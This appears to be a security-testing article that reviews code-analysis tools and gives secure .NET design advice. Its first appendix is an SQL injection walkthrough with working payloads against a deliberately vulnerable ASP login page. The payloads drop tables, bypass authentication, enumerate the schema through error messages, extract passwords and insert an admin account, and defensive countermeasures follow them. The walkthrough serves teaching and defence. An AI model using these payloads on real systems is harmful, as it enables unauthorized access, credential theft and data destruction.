The product comprises three main components: CodeAssure Workbench, CodeAssure Integrator and CodeAssure Management Center. The first two, Gardner says, are focused on performing security assessments, while the third delivers reporting and policy-checking capabilities to the entire organization. Workbench and Integrator both incorporate the product's analysis engine, which combines a flow-sensitive analysis with a comprehensive vulnerability knowledgebase to produce the most accurate assessments possible; the engine performs a complete data-flow and control-flow assessment of the entire program. Workbench integrates the analysis engine directly into Eclipse as a plug-in, while Integrator exposes a command-line interface to it. The CodeAssure Management Center provides a real-time, Web-based reporting and policy compliance system to answer security questions. Pricing for CodeAssure 2.0 starts at $48,000 for a 10-developer deployment.

Computer Associates' eTrust IAM Toolkit builds identities into applications. The eTrust Identity and Access Management Toolkit (eTrust IAM Toolkit) enables developers to build consistent and manageable identity-based security within their business applications. It is aimed at enabling policy-based security management, unifying the compliance process and improving responsiveness in change management. The toolkit provides a software development kit that lets developers embed a common set of fine-grained, identity-based security controls within applications. It can be implemented with a range of third-party provisioning and identity-management tools, as well as with CA's own eTrust security product line, and it uses a standard approach throughout an organization for building application authentication and authorization, and for centralizing the management of identities and application access policies. Pricing for the eTrust IAM Toolkit starts at $5,000. For more information, go to: ca.com/etrust/iam_toolkit

Parasoft's JContract (www.parasoft.com) supports Design by Contract (DbC), a formal way of using comments to incorporate specification information into the code itself. The code specification is expressed unambiguously using a formal language that describes the code's implicit contracts. These contracts specify such requirements as: conditions that the client must meet before a method is invoked; conditions that a method must meet after it executes; and assertions that a method must satisfy at specific points of its execution.
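JContract itself targets Java; purely to illustrate the DbC idea, here is a hedged Python sketch (the function is invented for this example) in which plain assertions play the role of the precondition and postcondition clauses:

```python
def sqrt_floor(n):
    """Integer square root, annotated with contract-style assertions."""
    # Precondition: the client must supply a non-negative integer.
    assert isinstance(n, int) and n >= 0, "precondition: n must be >= 0"
    r = 0
    while (r + 1) * (r + 1) <= n:
        r += 1
    # Postcondition: the method guarantees r*r <= n < (r+1)*(r+1).
    assert r * r <= n < (r + 1) * (r + 1), "postcondition violated"
    return r
```

A client that violates the precondition (for example, passing a negative number) fails immediately at the contract boundary rather than producing a silently wrong result.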

SPI Dynamics (www.spidynamics.com) produces WebInspect, an application security assessment tool that protects web security, and the security of your most critical information, by identifying known and unknown vulnerabilities. WebInspect complements firewalls and intrusion detection systems by identifying web application vulnerabilities, and can be used both in a test environment and in the real world. It also reinforces coding policies at all stages of the application lifecycle.

RATS - Among the free scanners, one of the most popular is RATS. Such tools can primarily be classified into static or dynamic analysis tools. Static tools essentially scan the code for unsafe functions and other language constructs; they are typically far more effective with unmanaged languages such as C and C++, where the list of unsafe functions is well documented. Dynamic analysis tool makers claim that their tools compile the source and determine call graphs and dataflow patterns, providing lower false-positive and false-negative rates than their static analysis counterparts.
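To make the static-analysis idea concrete, here is a toy grep-style scanner in Python (the function list is deliberately tiny and the names are illustrative; real tools such as RATS use much larger databases of unsafe constructs and do deeper parsing):

```python
import re

# Deliberately tiny list; real scanners know hundreds of constructs.
UNSAFE_FUNCTIONS = ("strcpy", "strcat", "sprintf", "gets")

def scan_source(source):
    """Return (line_number, function_name) for every call to an
    unsafe C function found, mimicking a static scanner's first pass."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for fn in UNSAFE_FUNCTIONS:
            if re.search(r"\b%s\s*\(" % fn, line):
                findings.append((lineno, fn))
    return findings

c_code = "char buf[16];\ngets(buf);\nstrcpy(buf, argv[1]);\n"
hits = scan_source(c_code)
```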

Tools Evaluation

Testing towards the discovery of unknown vulnerabilities is not possible. Security tests can, however, test for known vulnerabilities, information leaks, and deviations from law, industry standards and best practices. A security test is a point-in-time view: its output is a snapshot of the system at the moment of testing.

Tools have limited effectiveness. While they are useful in finding low-level problems, they are rarely effective in finding complex flaws, due mainly to design and top-level Software Development Life Cycle processes that do not give enough consideration to security testing. Further, they handle managed languages such as Java and C# poorly, which can hide issues such as buffer overflows. For instance, a tool used to scan code may report critical findings, while manual code review reveals far more significant and exploitable issues.

Web application scanners crawl across a Web site and find security bugs, acting like an automatic hacker. While they may have a place in a testing program, automated black-box testing will never be totally effective. Tools are the last thing to turn to when testing for a problem, not the first. This is not to discourage the use of tools; rather, their limitations should be understood and testing frameworks planned appropriately.

Methodologies, standards and frameworks aim to prove that adequate controls are in place and that senior management believes the controls are effective. They audit against an agreed standard and then accredit the application as adhering to best practices of security testing. But that is exactly, and only, what they do.

Conclusion

Only one in ten companies in the UK, and only one in four large businesses, have staff with formal information security qualifications [Kellet 04]. Support is often outsourced, and the employees of the outsourcing company have access to information that may be sensitive or believed to be protected. Building secure software means building better software. Testing the security of software means testing the software development life cycle, which in turn means testing the people, the process and the technology.

Despite all attempts at thoroughness and efficiency, one of the largest factors determining the success of security testing is still economics, and budgets for security defence remain small. If inefficient security testing becomes too costly, it is tempting for an organization to see security testing as an extraneous cost. This is unfortunate, because the risks associated with not conducting security testing remain unknown. However, the results will time and time again speak for themselves, and organizations will come to view security testing as cost-justified.

Testing only the technical implementation of an application will not uncover management or operational vulnerabilities that could be present. By testing the people and, most importantly, the process, you can catch issues that would later manifest themselves as defects in the technology, eradicate security issues early, and identify the root causes of defects.

Code review, using threat modelling and security code inspection, is the only effective way to perform a thorough analysis of your application's code base, finding the maximum number of vulnerabilities and other security issues. It also represents an effective way to integrate security into your software development life cycle. More importantly, once fully understood and integrated into the development process, these can be invaluable tools for improving quality.


Further Work

While high-level solutions to software security, such as reviewing SDLC processes or using risk analysis, are useful (and sometimes required), ultimately it is the programmer who writes the code, and programmers write code using the core and fundamental principles they have been taught.

These fundamental principles, taught and learned over the decades, were formed without security in mind. That is, there is an underlying assumption that software algorithms are immune to security threats. For example, the bubble sort algorithm sorts a list by comparing each adjacent pair of items in the list in turn, swapping the items if necessary, and repeating the pass through the list until no swaps are done. The binary nature of software principles declares that an object O is in state x or state y; there is no third state, no excluded middle. The assumption is that the objects in the cells of the list are supposed to be there; security is irrelevant. Perhaps further study could be carried out on well-known (and proven?) software algorithms with security in mind.
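For reference, the bubble sort described above can be sketched as:

```python
def bubble_sort(items):
    """Compare each adjacent pair, swap if out of order, and repeat
    the pass until no swaps are done (as described above)."""
    items = list(items)  # sort a copy; leave the caller's list alone
    swapped = True
    while swapped:
        swapped = False
        for i in range(len(items) - 1):
            if items[i] > items[i + 1]:
                items[i], items[i + 1] = items[i + 1], items[i]
                swapped = True
    return items
```

Note that nothing in the algorithm questions whether the items belong in the list at all; that trust is exactly the assumption discussed above.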

The core and fundamental software constructs of stdout and stderr have been used by hackers to fingerprint database applications: the hacker uses the well-intentioned messages from stdout and stderr for clues on how to attack. Verbose front-ends try to assist but end up compromising the whole system. Perhaps the three operating system streams stdin, stdout and stderr could likewise be reviewed with security in mind.

Appendix 1 SQL Injection

Most applications, including games, accounting, management, business and mission-critical systems, use a database. Databases are also known as the biggest security problem in application development, and are at risk of SQL injection. SQL injection attacks are popular when the application runs on the Web. Hackers can attempt to access your system by entering an SQL query that can break it. Most Web applications need a username and password to log in, and the container that stores all of the data is the database. A lot of information and credentials are held in the database, so establishing that the database is secure is very important when building an application.
Basically, SQL injection is the means by which a user can pass malicious code to a database by injecting their own code into your SQL statement by passing parts of an SQL statement to your query via an online form.
SQL injection is a technique for exploiting web applications that use client-supplied data in SQL queries without stripping potentially harmful characters first. Despite being remarkably simple to protect against, there is an astonishing number of production systems connected to the Internet that are vulnerable to this type of attack.
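The "remarkably simple" protection is to bind user input as parameters rather than concatenating it into the statement. A sketch using Python's sqlite3 module (standing in for the SQL Server/ASP environment used in the examples below; the table contents are illustrative):

```python
import sqlite3

# Illustrative in-memory database (names match the 'authors' example).
cn = sqlite3.connect(":memory:")
cn.execute("create table authors (id int, forename text, surname text)")
cn.execute("insert into authors values (1, 'Kurniawan', 'Daud')")

def find_author(forename, surname):
    """Parameterized query: user input is bound as data, so a quote
    character cannot break out of the SQL statement."""
    cur = cn.execute(
        "select id, forename, surname from authors"
        " where forename = ? and surname = ?",
        (forename, surname))
    return cur.fetchall()

# The single quote that breaks a concatenated query is harmless here:
rows = find_author("Kur'n", "Daud")
```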
SQL Injection occurs when an attacker is able to insert a series of SQL statements into a 'query' by manipulating data input into an application. A typical SQL statement looks like this:
select id, forename, surname from authors;
This statement will retrieve the 'id', 'forename' and 'surname' columns from the 'authors' table, returning all rows in the table. The 'result set' could be restricted to a specific 'author' like this:
select id, forename, surname from authors where forename = 'Kurniawan' and surname = 'Daud';
An important point to note here is that the string literals 'Kurniawan' and 'Daud' are delimited with single quotes. Presuming that the 'forename' and 'surname' fields are being gathered from user-supplied input, an attacker might be able to 'inject' some SQL into this query, by inputting values into the application like this:
Forename: Kur'n
Surname: Daud

The 'query string' becomes this:

select id, forename, surname from authors where forename = 'Kur'n' and surname = 'Daud'
When the database attempts to run this query, it is likely to return an error:
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'Kur'.
The reason for this is that the insertion of the 'single quote' character 'breaks out' of the single-quote-delimited data, leaving the remainder of the input stranded as invalid SQL. If the attacker instead specified input like this:

Forename: Kur'; drop table authors--

...the 'authors' table would be deleted (the '--' comment sequence is explained below). It would seem that some method of either removing single quotes from the input, or 'escaping' them in some way, would handle this problem. This is true, but there are several difficulties with this method as a solution. First, not all user-supplied data is in the form of strings. If our user input could select an author by 'id' (presumably a number), for example, our query might look like this:
select id, forename, surname from authors where id=1234
In this situation an attacker can simply append SQL statements on the end of the numeric input. In other SQL dialects, various delimiters are used; in the Microsoft Jet DBMS engine, for example, dates can be delimited with the '#' character. Second, 'escaping' single quotes is not necessarily the simple cure it might initially seem. To illustrate this in more detail, we build a sample Active Server Pages (ASP) 'login' page, which accesses a SQL Server database and attempts to authenticate access to some fictional application.
This is the code for the 'form' page, into which the user types a username and password:

<html>
<head>
<title>Login Page</title>
</head>
<body>
<h1>Login</h1>
<form action="process_login.asp" method="post">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>
</body>
</html>
This is the code for 'process_login.asp', which handles the actual login:



<%@LANGUAGE = JScript %>
<%
function trace( str )
{
if( Request.form("debug") == "true" )
Response.write( str );
}
function Login( cn )
{
var username;
var password;
username = Request.form("username");
password = Request.form("password");
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
trace( "query: " + sql );
rso.open( sql, cn );
if (rso.EOF)
{
rso.close();
%>
<h1>ACCESS DENIED</h1>
<%
Response.end
return;
}
else
{
Session("username") = "" + rso("username");
%>
<h1>ACCESS GRANTED</h1>
Welcome,
<% Response.write(rso("Username"));
Response.end
}
}
function Main()
{
//Set up connection
var username
var cn = Server.createobject( "ADODB.Connection" );
cn.connectiontimeout = 20;
cn.open( "localserver", "sa", "password" );
username = new String( Request.form("username") );
if( username.length > 0)
Login( cn );
cn.close();
}
Main();
%>



The critical point here is the part of 'process_login.asp' which creates the 'query string':
sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
If the user specifies the following:
Username: '; drop table users--
Password:
The 'users' table will be deleted, denying access to the application for all users. The '--' character sequence is the 'single line comment' sequence in Transact-SQL, and the ';' character denotes the end of one query and the beginning of another. The '--' at the end of the username field is required in order for this particular query to terminate without error.
The attacker could log on as any user, given that they know the user's name, using the following input:
Username: admin'--
The attacker could log in as the first user in the 'users' table, with the following input:
Username: ' or 1=1--
And strangely, the attacker can log in as an entirely fictional user with the following input:
Username: ' union select 1, 'fictional_user', 'some_password', 1--
The reason this works is that the application believes that the 'constant' row that the attacker specified was part of the record set retrieved from the database.
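The authentication bypass above can be reproduced end-to-end with any SQL engine. A sketch using Python's sqlite3 module (the table contents mirror the 'users' table defined later in this appendix), showing that string concatenation is the root cause:

```python
import sqlite3

# Illustrative in-memory stand-in for the 'users' table in this appendix.
cn = sqlite3.connect(":memory:")
cn.execute("create table users (id int, username text, password text)")
cn.execute("insert into users values (0, 'admin', 'r00tr0x!')")

def login_vulnerable(username, password):
    """Builds the query by string concatenation, exactly as
    'process_login.asp' does; vulnerable by construction."""
    sql = ("select * from users where username = '" + username +
           "' and password = '" + password + "'")
    return cn.execute(sql).fetchall()

denied = login_vulnerable("admin", "wrong")      # no rows: login fails
granted = login_vulnerable("' or 1=1 --", "x")   # where clause always true
```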
Obtaining Information Using Error Message - This technique was first discovered by David Litchfield and the author in the course of a penetration test. David later wrote a paper on the technique [WAD David], and subsequent authors have referenced this work. This explanation discusses the mechanisms underlying the 'error message' technique, enabling the reader to fully understand it, and potentially originate variations of their own. In order to manipulate the data in the database, the attacker will have to determine the structure of certain databases and tables. For example, our 'users' table might have been created with the following command:

create table users
(
id int,
username varchar(255),
password varchar(255),
privs int
)

and had the following users inserted:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff ) ;
insert into users values( 1, 'guest', 'guest', 0x0000 ) ;
insert into users values( 2, 'chris', 'password', 0x00ff );
insert into users values( 3, 'fred', 'sesame', 0x00ff );


Let's say our attacker wants to insert a user account for himself. Without knowing the structure of the 'users' table, he is unlikely to be successful. Even if he gets lucky, the significance of the 'privs' field is unclear. The attacker might insert a '1' and give himself a low-privileged account in the application, when what he was after was administrative access. Fortunately for the attacker, if error messages are returned from the application (the default ASP behaviour), the attacker can determine the entire structure of the database, and read any value that can be read by the account the ASP application is using to connect to the SQL Server.

How this Works - First, the attacker wants to establish the names of the tables that the query operates on, and the names of the fields. To do this, the attacker uses the 'having' clause of the 'select' statement:

Username: ' having 1=1--

This provokes the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/process_login.asp, line 35

So the attacker now knows the table name and column name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:

Username: ' group by users.id having 1=1--

This produces this error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35

Eventually the attacker arrives at the following 'username':

' group by users.id, users.username, users.password, users.privs having 1=1--

which produces no error, and is functionally equivalent to:

select * from users where username = ''

So the attacker now knows that the query is referencing only the 'users' table, and is using the columns 'id, username, password, privs', in that order.


It would be useful if he could determine the types of each column. This can be achieved using a 'type conversion' error message, like this:

Username: ' union select sum(username) from users--

This takes advantage of the fact that SQL server attempts to apply the 'sum' clause before determining whether the number of fields in the two row sets is equal. Attempting to calculate the 'sum' of a textual field results in this message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
/process_login.asp, line 35

which tells us that the 'username' field has type 'varchar'. If, on the other hand, we attempt to calculate the sum() of a numeric type, we get an error message telling us that the number of fields in the two rowsets don't match:

Username: ' union select sum(id) from users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/process_login.asp, line 35

We can use this technique to approximately determine the type of any column of any table in the database. This allows the attacker to create a well-formed 'insert' query, like this:

Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

However, the potential of the technique doesn't stop there. The attacker can take advantage of any error message that reveals information about the environment, or the database. A list of the format strings for standard error messages can be obtained by running:

select * from master..sysmessages


Examining this list reveals some interesting messages. One especially useful message relates to type conversion. If you attempt to convert a string into an integer, the full contents of the string are returned in the error message. In our sample login page, for example, the following 'username' will return the specific version of SQL server, and the server operating system it is running on:

Username: ' union select @@version,1,1,1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of data type int.
/process_login.asp, line 35

This attempts to convert the built-in '@@version' constant into an integer because the first column in the 'users' table is an integer. This technique can be used to read any value in any table in the database. Since the attacker is interested in usernames and passwords, they are likely to read the usernames from the 'users' table, like this:

Username: ' union select min(username), 1, 1, 1 from users where username > 'a'--

This selects the minimum username that is greater than 'a', and attempts to convert it to an integer:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.
/process_login.asp, line 35

So the attacker now knows that the 'admin' account exists. He can now iterate through the rows in the table by substituting each new username he discovers into the 'where' clause:

Username: ' union select min(username),1,1,1 from users where username > 'admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int.
/process_login.asp, line 35

Once the attacker has determined the usernames, he can start gathering passwords:

Username: ' union select password,1,1,1 from users where username = 'admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int.
/process_login.asp, line 35
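
The iteration loop described above is easy to automate. The following sketch (illustrative only, not from the original article; the `fetch_error` callback stands in for submitting the login form and parsing the leaked value out of the ODBC error message) shows how an attacker might script the username harvest:

```python
# Hypothetical sketch: automating the username-harvesting loop described above.
# Each payload asks the server for the next username greater than the last one
# found; the value comes back inside the type-conversion error message.

def next_username_payload(last_username: str) -> str:
    """Build the injected 'username' that reveals the next account name."""
    return ("' union select min(username),1,1,1 from users "
            f"where username > '{last_username}'--")

def harvest(fetch_error):
    """Iterate usernames until the error message no longer leaks a value.

    fetch_error(payload) is a stand-in for submitting the login form and
    extracting the varchar value from the resulting conversion error;
    it returns None when no more rows match.
    """
    found, last = [], "a"
    while True:
        value = fetch_error(next_username_payload(last))
        if value is None:
            return found
        found.append(value)
        last = value
```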


A more elegant technique is to concatenate all of the usernames and passwords into a single string, and then attempt to convert it to an integer. This illustrates another point: Transact-SQL statements can be strung together on the same line without altering their meaning. The following script concatenates the values:

begin declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo
end

The attacker 'logs in' with this 'username' (all on one line, obviously…)

Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end--

This creates a table 'foo', which contains the single column 'ret', and puts our string into it. Normally even a low-privileged user will be able to create a table in a sample database, or the temporary database.

The attacker then selects the string from the table, as before:

Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int.
/process_login.asp, line 35
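
As a plain-Python illustration (not from the original article), this is the string that the `select @ret=@ret+...` aggregation builds up row by row before it lands in the `foo` table:

```python
# Sketch: the T-SQL "select @ret=@ret+..." trick folds every row of the
# 'users' table into one string. This mirrors the result in plain Python.

def concat_credentials(rows):
    """rows: iterable of (username, password) pairs, in table order."""
    ret = ":"
    for username, password in rows:
        ret += " " + username + "/" + password
    return ret
```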

SQL Injection Prevention - Using Stored Procedures

One method of preventing SQL injection is to avoid using dynamically generated SQL in your code. By using parameterized queries and stored procedures, you make it impossible for SQL injection to occur against your application. For example, the previous SQL query could have been written as follows to avoid the attack demonstrated in the example:
Dim thisCommand As SqlCommand = New SqlCommand("SELECT Count(*) " & _
    "FROM Users WHERE UserName = @username AND Password = @password", Connection)
thisCommand.Parameters.Add("@username", SqlDbType.VarChar).Value = username
thisCommand.Parameters.Add("@password", SqlDbType.VarChar).Value = password
Dim thisCount As Integer = thisCommand.ExecuteScalar()
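The same principle can be shown in a short runnable sketch. The example below uses Python's sqlite3 module purely as a stand-in for the ADO.NET code above (the table and values are illustrative): the placeholders bind the input as data, so an injected string can never change the query's syntax.

```python
# Sketch of parameterized queries using Python's sqlite3 module
# (a stand-in for the ADO.NET example; table and values are illustrative).
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
conn.execute("INSERT INTO Users VALUES ('admin', 'r00tr0x!')")

def count_matches(username, password):
    # The ? placeholders bind the values; they can never alter the SQL syntax.
    cur = conn.execute(
        "SELECT Count(*) FROM Users WHERE UserName = ? AND Password = ?",
        (username, password))
    return cur.fetchone()[0]
```

With this in place, a classic injection string such as `' OR 1=1 --` is treated as a literal (and non-matching) username rather than as SQL.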
Passing parameters avoids many types of SQL injection attacks, and an even better method of securing your database access is to use stored procedures. Stored procedures can secure your database by restricting objects within the database to specific accounts, and permitting those accounts only to execute stored procedures. Your code then does all database access using this one account, which has no other permissions, such as write access, that would allow an attacker to inject SQL statements to be executed against your database. Any interaction with your database must go through a stored procedure that you wrote and that resides in the database itself, which is usually inaccessible from a perimeter network or DMZ.
So if you wanted to do the authentication via a stored procedure, it may look like the following:
Dim thisCommand As SqlCommand = New SqlCommand("proc_CheckLogon", Connection)
thisCommand.CommandType = CommandType.StoredProcedure
thisCommand.Parameters.Add("@username", SqlDbType.VarChar).Value = username
thisCommand.Parameters.Add("@password", SqlDbType.VarChar).Value = password
thisCommand.Parameters.Add("@return", SqlDbType.Int).Direction = ParameterDirection.ReturnValue
Dim thisCount As Integer = thisCommand.ExecuteScalar()
Finally, ensure you provide very little information to the user when an error does occur. If there is a database access failure, make sure you don't dump out the entire error message. Always try to provide the least amount of information possible to the users. Besides, do you want them to start helping you debug your code? If not, why provide them with debugging information? By following these tips for your database access, you're on your way to preventing unwanted eyes from viewing your data.
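One way to implement this advice is to catch database errors at the access layer, log the details server-side, and return only a generic result to the caller. The sketch below (illustrative; names like `check_logon` are hypothetical, and sqlite3 stands in for whatever database driver is in use) shows the pattern:

```python
# Sketch: surface a generic failure to users while keeping full error detail
# in the server log (function and table names are illustrative).
import logging
import sqlite3

logger = logging.getLogger("auth")

def check_logon(conn, username, password):
    try:
        cur = conn.execute(
            "SELECT Count(*) FROM Users WHERE UserName = ? AND Password = ?",
            (username, password))
        return cur.fetchone()[0] > 0
    except sqlite3.Error:
        # Full detail (stack trace, driver message) stays in the log.
        logger.exception("database error during logon")
        # The user sees only a failed logon, never the SQL error text.
        return False
```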
SQL Injection Prevention - Protect your SQL Syntax
To secure an application against SQL injection, developers must never allow client-supplied data to modify the syntax of SQL statements. In fact, the best protection is to isolate the web application from SQL altogether. All SQL statements required by the application should be in stored procedures and kept on the database server. The application should execute the stored procedures using a safe interface such as JDBC's CallableStatement or ADO's Command object. If arbitrary statements must be used, use prepared statements. Both prepared statements and stored procedures compile the SQL statement before the user input is added, making it impossible for user input to modify the actual SQL statement.

The relevant code would look something like this:
String query = "SELECT title, description, releaseDate, body FROM pressReleases WHERE pressReleaseID = " + request.getParameter("pressReleaseID");
Statement stmt = dbConnection.createStatement();
ResultSet rs = stmt.executeQuery(query);
The first step toward securing this code is to take the SQL statement out of the web application and put it in a stored procedure on the database server.
CREATE PROCEDURE getPressRelease
    @pressReleaseID integer
AS
SELECT title, description, releaseDate, body
FROM pressReleases
WHERE pressReleaseID = @pressReleaseID
Now back to the application. Instead of building a SQL statement as a string to call the stored procedure, a CallableStatement is created to safely execute it.
CallableStatement cs = dbConnection.prepareCall("{call getPressRelease(?)}");
cs.setInt(1, Integer.parseInt(request.getParameter("pressReleaseID")));
ResultSet rs = cs.executeQuery();
In a .NET application, the change is similar. This ASP.NET code is vulnerable to SQL injection:
String query = "SELECT title, description, releaseDate, body FROM pressReleases WHERE pressReleaseID = " + Request["pressReleaseID"];
SqlCommand command = new SqlCommand(query,connection);
command.CommandType = CommandType.Text;
SqlDataReader dataReader = command.ExecuteReader();
As with the JSP code, the SQL statement must be converted to a stored procedure, which can then be accessed safely by a SqlCommand configured as a stored procedure call:
SqlCommand command = new SqlCommand("getPressRelease",connection);
command.CommandType = CommandType.StoredProcedure;
command.Parameters.Add("@PressReleaseID",SqlDbType.Int);
command.Parameters[0].Value = Convert.ToInt32(Request["pressReleaseID"]);
SqlDataReader dataReader = command.ExecuteReader();



SQL Injection Prevention - Protect at the Application Level
Another way to prevent SQL injection is to protect the application's forms by escaping or removing any characters that could be used in an injection attempt. The following is an example of a function that escapes SQL characters:
Function RemoveCharacters()
    Dim frm, Item
    Set frm = Server.CreateObject("Scripting.Dictionary")
    frm.CompareMode = 1
    For Each Item In Request.Form
        If Trim(Request.Form(Item)) <> "" Then
            If Request.Form(Item) = "1" Or Request.Form(Item) = "0" Then
                frm.Add CStr(Item), CBool(Replace(Request.Form(Item), "'", "''"))
            Else
                frm.Add CStr(Item), Replace(Request.Form(Item), "'", "''")
            End If
        End If
    Next
    Set RemoveCharacters = frm
End Function
Your main code then calls this function:
dim myform
Set myform = RemoveCharacters()
From there, you just read each element from the form dictionary, for example: myform("my variable"), and the value is delivered to the browser (or your application) cleansed and ready to use, without your having to declare any variables.
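The core of the function above is doubling single quotes so user input cannot terminate a string literal early. A minimal sketch of that transformation in Python (illustrative only; note that quote-doubling is a weaker defense than the parameterized queries discussed earlier):

```python
# Sketch of the quote-doubling idea from the ASP function above.
# Doubling single quotes prevents input from closing a SQL string literal,
# but it is a weaker defense than parameterized queries.

def escape_sql_value(value: str) -> str:
    return value.replace("'", "''")
```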
SQL Injection Prevention - Combination Approach
The best practice when designing your database application is to combine these defenses against SQL injection attempts. First, make sure that your SQL syntax is secure. Second, make sure that your application filters SQL characters in its input. Finally, use stored procedures to update your database, and define appropriate restrictions in your DBMS, such as Oracle or SQL Server.

Appendix 2 .NET Application

.NET programming is very popular nowadays because of the flexibility of the .NET Framework, and many programmers develop software with it. Even though some say that the .NET Framework is a more secure platform, we must still understand how to build secure applications on it. One popular .NET security technology is WSE 2.0, which is used to secure .NET applications over the Web and to address the lack of security in the XML messages sent between client and server.

Before we can secure our .NET Application that we build, we need to consider how to design a .NET Application first. Security is an important part of the design process and cannot be left until the implementation phase. A fully integrated security policy will provide the greatest protection against your application being subverted and simplify the process of integrating security functionality into your code. You cannot retrofit a comprehensive security model into a design.

The first step towards applying security to an application design is to identify the restricted resources and secrets. A restricted resource is functionality to which you wish to control access; a secret is a piece of data that you wish to hide from third parties.

Creating the list of restricted resources associated with your application is the foundation for understanding the trust relationships that you need to define, which we discuss in the next section. Restricted resources tend to fall into three categories:
Functional resources - Functional resources are the features that your application provides, for example, the ability to approve a loan within a banking application. These resources are easy to identify and are defined with the functional specification for the application.
Subversion resources - Subversion resources do not appear significant at first glance, but can be used in conjunction with a functional or external resource to subvert your application or the platform on which your application executes. For example, one such resource is the ability to write data to a file that the operating system uses to enforce security policy.
External resources - External resources are those that underpin your application—for example, a database. Access to these resources should be coordinated with access to your functional resources, so that, for example, users who are unable to approve loans through a functional resource are not able to edit the database directly to achieve the same effect.
Suggestions to help identify restricted resources:
Open your design to review. Do not work in isolation; ask for, and act on, the comments of your colleagues. Different people think in different ways, and we have found that reviewing application designs in groups is especially effective for identifying subversion resources.
Apply common sense. Do not follow the business specification slavishly.
As an architect, you are responsible for designing an application that satisfies all of the business and technical objectives of the project, even those that are not stated explicitly. By applying some common sense, you can often identify resources that must be restricted in order to achieve the wider objectives of your organization.
Consider the way your application interacts with other systems.
Think carefully about the way in which your application depends on other services. Access to some resources may need to be restricted in order to protect other systems, even though they cannot be used to subvert your application.
Define and follow design standards. By applying a common design methodology to all of your projects, you can create patterns of functionality that are recognized easily as restricted resources.

Identifying Secrets
Identifying secrets is usually a simpler process than identifying restricted resources. You must examine each type of data that your application creates or processes, and decide if that data requires protection.
These are my suggestions that help you in identifying Secrets:
• Consider the effect of disclosure. Understand the impact of disclosing the data that your application works with, and use this information to assess what data should be a secret. Remember, sometimes data is protected for reasons of public image rather than practical considerations. For example, the damage to your company’s reputation exceeds the damage to a credit card holder if you expose his card number to the world. The credit card provider limits the cardholder’s liability, but there is no limit to the amount of damage bad publicity can do to your business.

• Consider who owns the data. If you process data that is created or supplied by another application, you should protect the data to at least the same level as that application does. Your application should not be an easy means of accessing data that is better protected elsewhere.

• Consider your legal obligations. You may have legal obligations to ensure that certain information remains private, especially the personal details of your customers. Seek legal advice to establish your responsibilities.


Developing a Secure .NET Application
The developer is often responsible for making implementation decisions, such as the strength of cryptography used to protect secrets or the way security roles are employed. There is often a temptation to adopt new and exciting technologies, which is a dangerous approach when applied to application security. Security is best established by using tried-and-tested techniques, and by using algorithms and implementations that have been subjected to extensive testing.
You should implement your security policy to simplify the configuration wherever possible, and to use default settings that offer a reasonable level of security without any configuration at all. You cannot expect a system administrator to have the in-depth knowledge required to develop the application or the time to invest in learning the intricacies of your application. Document the default settings you have used, and explain their significance.
Here are some tips and tricks from me; you may follow these steps while developing your .NET application:
• Take the time to understand the business. You will find it easier to understand the decisions made in the application design if you take the time to understand the business problem the application is intended to solve. Remember that the architect is the “bridge” between the business problem and the technical solution, and decisions that may appear to have no technical justification are often influenced by business factors.

• Do not rely on untested security libraries. Developers are usually responsible for selecting third-party tools and libraries for the application implementation. We recommend that you select security libraries from reputable companies and submit their products to your own security-testing procedure

• Ensure that someone knows when you make a change.
Implementing changes in isolation is likely to open security holes in your application. Components of a software system are often highly dependent on each other. Unless told of a change, other people working from the original design will assume that your components function as specified and will make implementation decisions for their own components based on those assumptions.

• Apply rigorous unit testing. You should test all of the classes that you develop as part of the application implementation. This testing should not only test the expected behavior, but also make sure that unexpected inputs or actions do not expose security weaknesses. In this regard, your unit testing is a simplified form of the security testing that we describe below.

• Remove any default accounts before deployment. It is usual to create default user accounts or trust levels that simplify unit testing; you must ensure that these are disabled or removed before the application is tested and deployed.
Security testing a .NET Application
